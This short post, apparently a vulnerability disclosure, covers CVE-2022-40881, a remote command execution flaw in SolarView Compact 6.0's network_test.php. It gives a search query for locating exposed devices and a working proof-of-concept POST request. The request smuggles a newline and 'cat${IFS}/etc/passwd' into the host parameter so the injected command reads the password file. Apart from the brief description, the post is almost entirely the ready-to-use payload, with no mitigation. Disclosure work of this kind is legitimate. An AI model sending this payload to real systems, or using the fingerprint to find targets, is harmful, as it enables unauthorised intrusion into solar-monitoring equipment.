Solarview Network_test Php Remote Command Execution Vulnerability Cve 2022 40881
Solarview Network_test Php Remote Command Execution Vulnerability Cve 2022 40881
SolarView network_test.php Remote command execution vulnerability CVE-2022-40881
Vulnerability Description
There is a remote command execution vulnerability in SolarView network_test.php. The attacker can obtain server permissions by constructing special requests.
Vulnerability Impact
SolarView Compact 6.0
Network surveying and mapping
body=”SolarView Compact” && title==”Top”
Vulnerability reappears
Main page
Verify POC
1
2
3
POST /network_test.php
host=%0acat${IFS}/etc/passwd%0a&command=ping
This post is licensed under CC BY 4.0 by the author.